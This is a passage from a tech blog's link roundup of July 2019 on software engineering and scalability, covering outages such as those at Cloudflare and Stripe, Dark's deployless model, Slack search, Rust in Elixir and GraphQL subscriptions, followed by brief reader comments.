  • You may not agree with everything but the reasoning should prove instructive. My biggest lesson, at least on Thursdays, is software is a team sport. What's yours? Things I Learnt The Hard Way (in 30 Years of Software Development): Spec first, then code; Write steps as comments; Gherkin (test description format) is your friend to understand expectations; Unit tests are good, integration tests are gooder; Tests make better APIs; Be ready to throw your code away; Solve the problem you have right now; Documentation is a love letter to your future self; The function documentation is its contract; If a function description includes an "and", it's wrong; Types say what you data is; If your data has a schema, use a structure to keep it; "Right tool for the job" is just to push an agenda; Data flows beat patterns, and many more. Good discussion on HackerNews.

  • I like to think of the effort to operate a distributed system being similar to operating a large organization, like a hospital. Practices found useful at Uber to reliably operate a large system: Monitoring; Oncall, Anomaly Detection & Alerting; Outages & Incident Management Processes; Postmortems, Incident Reviews & a Culture of Ongoing Improvements; Failover Drills, Capacity Planning & Blackbox Testing; SLOs, SLAs & Reporting on Them; SRE as an Independent Team; Reliability as an Ongoing Investment; Further Recommended Reading. Mitigation now, investigation tomorrow. The most common failure scenario I have observed is services not having enough resources in a new data center to handle global traffic. When a company grows to reliability work across teams takes up more than a few engineers' time, it's time to put a dedicated team for this in place. 

  • Advice from Amazon, UPS, and Home Depot on How to prevent a Prime Day crash. Prepare for double or triple that number. Begin preparations months in advance. Making sure your system is as dynamically scalable as possible. Be strategically multi-regional, divvy up the onslaught of traffic by where in the country/world it’s coming from. Lock down our applications ahead of peak month to avoid any last-minute changes causing problems. Stress test. Levarage traffic data from past years to predict future results. 

  • Videos from React Europe are now available

  • Since a regular expression processor is basically an embedded interpreter and interpreters in embedded systems are very dangerous because of their lack of predictability, REs should probably not be used in production. A pattern you didn't test could blow up at any time. Details of the Cloudflare outage on July 2, 2019: Unfortunately, last Tuesday’s update contained a regular expression that backtracked enormously and exhausted CPU used for HTTP/HTTPS serving. This brought down Cloudflare’s core proxying, CDN and WAF functionality. 

  • If you are a small government in Florida this won't help. Secure Cloud Architecture - Towards a Smart City cloud privacy, Security, and Rights-Inclusive Architecture. Start with a 3 level classification scheme: Red sensitive data including personally identifiable information; so most controlled and restricted; Yellow medium sensitivity information whose access may be controlled but by law can be shared more widely; although still with controls and monitoring; Green low sensitivity data which can be shared openly – smart city civic and open data. After that, not much of practical use.

  • Python, Java, and Javascript as the top three most in-demand languages says Coding Dojo. My decision to go with Perl over Python all those years ago is not aging well. Of course ReactJS is the top framework. MySQL and Redis tie for the top database. So while it seems everything is changing it appears not that much has changed.

  • Videos from Gophercon SG 2019 are now available

  • Microsoft Security Response Centre is saying they are considering replacing C and C++ with Rust. The idea is to stop piling tooling on top of insecure languages and just use a secure language to start with. We will see. 

  • The combination of deployless and feature flags means that about 60% of the deployment pipeline is no longer necessary. How Dark deploys code in 50ms.
    • The first and most important decision was to make Dark “deployless” (thanks to Jessie Frazelle for coining the term). Deployless means that anything you type is instantly deployed and immediately usable in production. 
    • Dark runs interpreters in the cloud. When you write new code in a function or HTTP/event handler, we send a diff of the Abstract Syntax Tree (the representation of your code that our editor and servers use under the hood) to our servers, and then we run that code when requests come in. So deployment is just a small write to a database, which is instant and atomic. 
    • Our deploys are so fast because we trimmed a deploy to the smallest thing possible. One way to reduce accidental complexity in Dark is by solving many different problems with a single solution. Feature flags is our workhorse: replacing local dev environments, git branches, code deployment, and of course still providing the traditional use-case of slow, controlled roll-out of new code. 
    • pbigger: The model is quite different to how people write code today. Instead of a process that takes code from your machine and sends it to prod (and thus has a lot of risk), you code in a sorta sandbox _in prod_. That is then enabled for users via changing the feature flag setting
    • pbigger: We run the infrastructure in the cloud (we run it on GCP using Postgres and k8s, but will likely go multicloud at some point). Most of the advantages we discuss in this post come from the fact that you're using the Dark editor, language and infra. I don't believe this would be possible with a self-hosted solution.

  • This is why we can't maintain nice things. OpenFaaS Creator on Open Source’s Community-Funding Model. Is the reason companies won't pay the maintainers of the open source software they use and profit from because they see it as charity? Whatever the reason corporate support for open source has proven to be a failed model. 

  • You probably don't have enough fault isolation. Stripe's Root cause analysis: significantly elevated error rates on 2019‑07‑10: we implemented additional monitoring to alert us when nodes stop reporting replication lag; We are also introducing several changes to prevent failures of individual shards from cascading across large fractions of API traffic. This includes additional circuit-breaking on failed operations to particular clusters, including the one implicated in these events. We will also pursue additional fault isolation techniques to contain the impact of a single failed shard and limit resource consumption by clients attempting repeated retries of failed requests; we will introduce further procedures and tooling to increase the safety with which operators can make rapid configuration changes during incident response.

  • Are you checking your certificates are expiring? Technical Details on the Recent Firefox Add-on Outage.

  • The usual page after page detailing why OOP sucks and the equally usual paragraph saying functional programming is the answer without any proof but the toe curling idealism of the converted. Object-Oriented Programming — The Trillion Dollar Disaster. Yes, OOP has been used poorly. But it has been used. Why might that be? Are programmers so irrational and full of self-hatred that they would maintain a multi-decade long conspiracy against FP? That must be it. 

  • Newton missed data gravity, but it's a real force. If you are considering moving a lot of data to the cloud then don't miss this experience report. Migrating 6.5TB of FileStream Data to AWS S3 - A Journey Concluded. It's quite the heroic tale. 
    • A lesson is to create a service interface from the beginning so data is written through one API. That would have made finding all write paths into the database much easier.
    • Versioining is also on. It was one of the biggest draw-cards to using S3 versus any other service, was the ability to know that user based actions like delete or overwrite could have protection against.
    • Main savings were cost and reliability. Yes, S3 can do go, we know that. But there was always a FAR greater chance this server we ran would go down, far higher than S3 going down. It had had 6+ outages in the 6 months during this cutover alone! :)

  • It has been said most recent mobile services are about replacing all the jobs a mom typically performed. I wonder what this means?  The Ideal Startup Toolstack to Scale Your Growth: Slack, Intercom, Chargebee, HubSpot, Zendesk, ProductBoard, Gitlab, Elium, Zoom, Zapier, Google Suite, Stripe, Chartmogul, Spendesk, Apollo, Wisepop, Pixelme, Squarespace, Lempod, Quuu, Smartrecruiters, Bamboo HR, CRM HubSpot, Intercom, Planhat, Mixpanel, Marvel, Sketch.

  • Client side caching in Redis 6.  Client libraries are usually fairly dumb, but they can do a lot iff you are willing to move complexity into the client. Here's a clever approach Redis is adopting to create a caching layer in the client. Many clients have a lot of memory. Why not use it? For some irony Fast key-value stores: An idea whose time has come and gone argues for client side caching of data because it gets rid of marshaling overhead and network latency. They quote improvements of 99.9% latency by 40%. Though I seem to remember OO databases of the past faulting objects into memory—they didn't make it.

  • Kubernetes Co-Founders On K8s’ Past, Present and Future (It Ain’t All Pretty). Why did the engineering community evolve around k8s instead of docker? Is the utility being driven by vertical integration or driven by modularity? Since k8s is an intrinsically more modular system it allowed every vendor to see someway to create unique value. As a result k8s became a natural aggregation point for the community to rally around. Where because Docker was much more focussed on vertical integration and closed system experience it just wasn't that interesting to other vendors that wanted to bring resources. 

  • You should tend to prefer mature things, and you should try not to use too many things.  Choose Boring Technology: "Then one day I said, “hey, I wonder how activity feeds is doing.” And I looked at it and was surprised to discover that in the time since we’d launched it, the usage had increased by a factor of 20. And as far as I could tell it was totally fine. The fact that 2,000% more people could be using activity feeds and we didn’t even have any idea that it was happening is certainly the greatest purely technical achievement of my career. The reason it was possible was because we used the shared stack. There were people around whose job involved noticing that we needed more MySQL’s or cron boxes or whatever. And there were other people who had to go to the datacenter and plug in new machines. But they were doing that horizontal scaling because the site was growing holistically. Nobody doing this had any awareness of our lone feature." Of course what is boring is a moving target. My guess if you want a technology bad enough you can make a reasonable argument as to why it's boring.

  • Really all objects are algorithms and all algorithms are objects. Two sides of the same coin. Algorithms as objects

  • Wouldn't it be wonderful if the tools we use to build the web were as accessible as spreadsheets areRich Harris - Rethinking reactivity. Brilliant. Never thought of spreadsheets as reactive programs. What matters is the functionality, not where the functionality happens. The only reliable way improve performance is to get rid of code.

  • The Tortoise and the Hare. The LSAT reminds me of software interviews and the lack of relationship between schools, grades, and interview performance to success at the job. For some reason we'd rather haze people instead of train people.

  • Checklists have been part of code reviews for 30 years. The Simple Genius of Checklists, from B-17 to the Apollo Missionseuler_angles: I have been a flight test and rocket test engineer. Checklists were life, especially in the rocket world. The fantastic thing about checklists is that they both keep you accountable and free your mental resources so that when something happens that one of your checklists don't cover, you know you've at least tried all the sane/expected things. I personally found that backstop freeing and allowed me to use my creativity when it was demanded by things going wrong.

  • Everything old is new again. Using AWK and R to parse 25tb. scottlocklin: You can solve many, perhaps most terascale problems on a standard computer with big enough hard drives using the old memory efficient tools like sed, awk, tr, od, cut, sort & etc. A9's recommendation engine used to be a pile of shell scripts on log files that ran on someone's desktop...

  • Comparing the Same Project in Rust, Haskell, C++, Python, Scala and OCaml: I think my overall takeaway is that design decisions make a much larger difference than the language, but the language matters insofar as it gives you the tools to implement different designs.

  • Did you know there's an entire conference on GraphQL? GraphQL Conf 2019 in a nutshell - Some Takeaways. Serveral videos are available. 

  • Jonathan Sumption argues against Britain adopting a written constitution as a response to political alienation. 5/5. Shifting the Foundations. A thought provoking series of podcasts. In computing we tend to like systems based on a system of laws. We love security based constraint solvers because we can prove a system secure. These lectures make the case that judges and the legal system is not the place for making policy, that's the realm of a political process where we debates issues and make decisions. The big problem is in the US our democracy relies upon the political process to counter partisanship, which sounds good in theory—people working out their problems together; in practice the political process algorithm has not proved a sufficient immune system to sustain a democracy against the constant stream of forces subverting it for their own ends. In response in the US we’ve tried giving more power to the legal system in the hopes it might be enough to save democracy, but that strategy is essentially conservative. It’s not adaptive. A legalistic system can not rise to meet the problems of the present or the challenges of the future. I think this is relevant in the future because of AI. AI will no doubt play a larger governing role in our future. The problem is any AI mediated system will certainly be legalistic. That may not be what we want, but that may be what we deserve.

  • It's not on-prem. It's not IaaS. It's something new. What is an AWS Outpost Rack? This is what you'll see inside an AWS datacenter and is the product of 12 years of development. It's 24" wide, 48" deep, and 80" tall. It has casters so it can be rolled into position. You plug in power and networking and automation takes over. There's a bus bar in the back and power shelf in the middle. Every server does not have a power supply. The outpost rack uses a centralized redundant power conversion unit and DC distribution unit in the backplane. Dual switches are included. Every active component is redundant and can be pulled and replaced without interrupting service. You'll be notified of any detected failure and how to replace a unit. Bringing new capacity online is completely automated. Switches are 100 gig capable supporting 4 100 gig connections. You can use 10 gig optics. Racks can be linked together. Nitro cards are in every server. The only difference between this rack and one used in EC2 is that it includes an additional Nitro chip in every server to connect it back to the public region. Outpost brings AWS to wherever you need it. 

  • Video Upload Latency Improvements at Instagram: A simple improvement to reduce video upload latency is to only do the minimal work necessary before a video is considered publishable; We represent our video data model with a graph-based storage system. All video versions are attached to a “video asset” parent node, which allows us to reason about the video at the uploaded media level instead of the video version level. This abstraction enables simple and unified publishing logic; We represent our video data model with a graph-based storage system. All video versions are attached to a “video asset” parent node, which allows us to reason about the video at the uploaded media level instead of the video version level. This abstraction enables simple and unified publishing logic; Another performance optimization we use to improve the upload latency and save CPU utilization is something we call a “passthrough” upload. In some cases, the media that is uploaded is already ready for playback on most devices. If so, we can skip the video processing altogether and store the video directly into our data model.

  • You are not alone. Kubernetes Failure Stories

  • 309 – Forensic Engineering. This big difference in building structures is there are standards, requirements, materials, and standard load calculations, an understanding of forces, and doubling rules for safety factors, understanding of failure modes. Most software is is still made out of custom everything. Perhaps as the cloud services become more standard software can become a little more like structure engineering.

  • Rebuilding Message Search at Slack. Search is different at Slack. It's not like the web because every user has there own unique document set they have access to. It's not like email because there is a lot of commonality within teams. Messages quickly lose relevance over time. Not a lot of head queries, which means queries are unique so caching doesn't help a lot. 100x write to read ratio. Old system used Solr and assigned teams to fixed shards forever, so large teams could blow out a shard. Had to scale vertically and it cost a lot. Performance wasn't great. Changing the index would require feeding the entire message flow which would take months. The new system uses SolrCloud because that was the easiest migration and didn't see a big win with any other system. Built an offline indexing map-reduce like pipeline using snapshots from the MySQL database. Backups of MySQL are copied to S3 and the map-reduce pipeline is kicked off which produces Solr shards which are uploaded into the system. This is done every week. 

  • Using Rust to Scale Elixir for 11 Million Concurrent Users. While using a safe language like Elixir has advantages, it makes doing some simple things difficult—like creating a large, heavily updated, in-memory list: "The double-edged sword of immutable data structures is that mutations are modeled by taking an existing data structure and an operation and creating a brand new data structure that is the result of applying that operation to the existing data structure." After many workarounds, they went with another safe language: "The Rust backed NIF provides massive performance benefits without trading off ease of use or memory. Since the library operations all clocked in well under the 1 millisecond threshold, we could just use the built-in Rustler guarantees and not need to worry about reductions or yielding. The SortedSet module looks to the caller to just be a vanilla Elixir module that performs crazy fast."

  • A thorough explanation of event sourcing. Online Event Processing. May the log be with you. 

  • I had a most negative visceral reaction to reading this. Who doesn't love queues? But the discussion is a good one. @rbranson: "Queues are bad, but software developers love them. You'd think they would magically fix any overload or failure problem. But they don't, and bring with them a bunch of their own problems. First off, queues turn your system into a liar. Convert something to an async operation and your system will always return a success response. But there's no guarantee that the request will actually ever be processed successfully." Tim Bray wrote a response in On SQS: "While there are good queues, I agree with his sentiment. If you can build a straightforward monolithic app and never think about all this asynchronous crap, go for it! If your system is big enough that you need to refactor into microservices for sanity’s sake, but you can get away with synchronous call chains, you definitely should." Good discussion on HackerNews.

  • This is My Architecture has a lot of great videos from various companies.

  • Scaling to 1 million active GraphQL subscriptions (live queries): Implementing live-queries is painful. Once you have a database query that has all the authorization rules, it might be possible to incrementally compute the result of the query as events happen. But this is practically challenging to do at the web-service layer. For databases like Postgres, it is equivalent to the hard problem of keeping a materialized view up to date as underlying tables change. An alternative approach is to refetch all the data for a particular query (with the appropriate authorization rules for the specific client). This is the approach we currently take. Secondly, building a webserver to handle websockets in a scalable way is also sometimes a little hairy, but certain frameworks and languages do make the concurrent programming required a little more tractable...After these experiments, we’ve currently fallen back to interval based polling to refetch queries. So instead of refetching when there is an appropriate event, we refetch the query based on a time interval. 

Soft Stuff:

  • andygrove/ballista: Ballista is a proof-of-concept distributed compute platform based on Kubernetes and the Rust implementation of Apache Arrow.
  • cuelang/cue: CUE is an open source data constraint language which aims to simplify tasks involving defining and using data. You can use CUE to define a detailed validation schema for your data (manually or automatically from data) reduce boilerplate in your data (manually or automatically from schema) extract a schema from code generate type definitions and validation code merge JSON in a principled way define and run declarative scripts.
  • uber-research/plato-research-dialogue-system: The Plato Research Dialogue System is a flexible framework that can be used to create, train, and evaluate conversational AI agents in various environments. It supports interactions through speech, text, or dialogue acts and each conversational agent can interact with data, human users, or other conversational agents (in a multi-agent setting). 

Pub Stuff: 

  • Migrating to GraphQL: A Practical Assessment: As our key result, we show that GraphQL can reduce the size of the JSON documents returned by REST APIs in 94% (in number of fields) and in 99% (in number of bytes), both median results.
  • Nines are Not Enough: Meaningful Metrics for Clouds: We also suggest that defining guarantees in terms of defense against threats, rather than guarantees for application-visible outcomes, can reduce the complexity of these problems. Overall, we offer a partial framework for thinking about Service Level Objectives (SLOs), and discuss some unsolved challenges.
  • THE DAWN OF ROBOT SURVEILLANCE: Today’s capture-and-store video systems are starting to be augmented with active monitoring technology known variously as “video analytics,” “intelligent video analytics,” or “video content analysis.” The goal of this technology is to allow computers not just to record but also to understand the objects and actions that a camera is capturing. This can be used to alert the authorities when something or someone deemed “suspicious” is detected, or to collect detailed information about video subjects for security or marketing purposes.
  • Towards Multiverse Databases: The central idea behind multiverse databases is to push the data access and privacy rules into the database itself. The database takes on responsibility for authorization and transformation, and the application retains responsibility only for authentication and correct delegation of the authenticated principal on a database call. Such a design rules out an entire class of application errors, protecting private data from accidentally leaking.
  • Google's AI papers at CVPR 2019
  • Scaling Time Series Motif Discovery with GPUs: Breaking the Quintillion Pairwise Comparisons a Day Barrier: In this work we show that with several novel insights we can push the motif discovery envelope using a novel scalable framework in conjunction with a deployment to commercial GPU clusters in the cloud. We demonstrate the utility of our ideas with detailed case studies in seismology, demonstrating that the efficiency of our algorithm allows us to exhaustively consider datasets that are currently only approximately searchable, allowing us to find subtle precursor earthquakes that had previously escaped attention, and other novel seismic regularities.

Reader Comments (9)

Welcome back!

July 19, 2019 | Unregistered CommenterJoel Williams

Wow! You have no idea how much I missed this blog.

July 19, 2019 | Unregistered CommenterCoco

Wow, that's a yuuuggee post. Thank you! Will make the weekend busy!

July 20, 2019 | Unregistered CommenterFan

Damn, I've missed this series!

July 22, 2019 | Unregistered Commenterjoonas.fi

Freeman (Dyson) is misspelled as Freemon.

July 22, 2019 | Unregistered CommenterDude

Thanks for posting!! Loves a lot of the content this time..... always learn something useful.

July 23, 2019 | Unregistered CommenterPhil Mattson

Since i have started using NCache distributed caching, i dont feel any scaling issues.

July 23, 2019 | Unregistered CommenterAyesha Irshad

Interesting. any reason behind no https on the site.

July 24, 2019 | Unregistered CommenterKris

Yes, there's a hard redirect in Squarespace's web server back to http so there's a loop when I use cloud flare to add https.Squarespace doesn't support HTTPS on V5. I'd have to move to a mobile version. After much trial and effort and no cooperation from SS I've given up.

July 25, 2019 | Registered CommenterTodd Hoff

PostPost a New Comment

Enter your information below to add a new comment.
Author Email (optional):
Author URL (optional):
Some HTML allowed: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <code> <em> <i> <strike> <strong>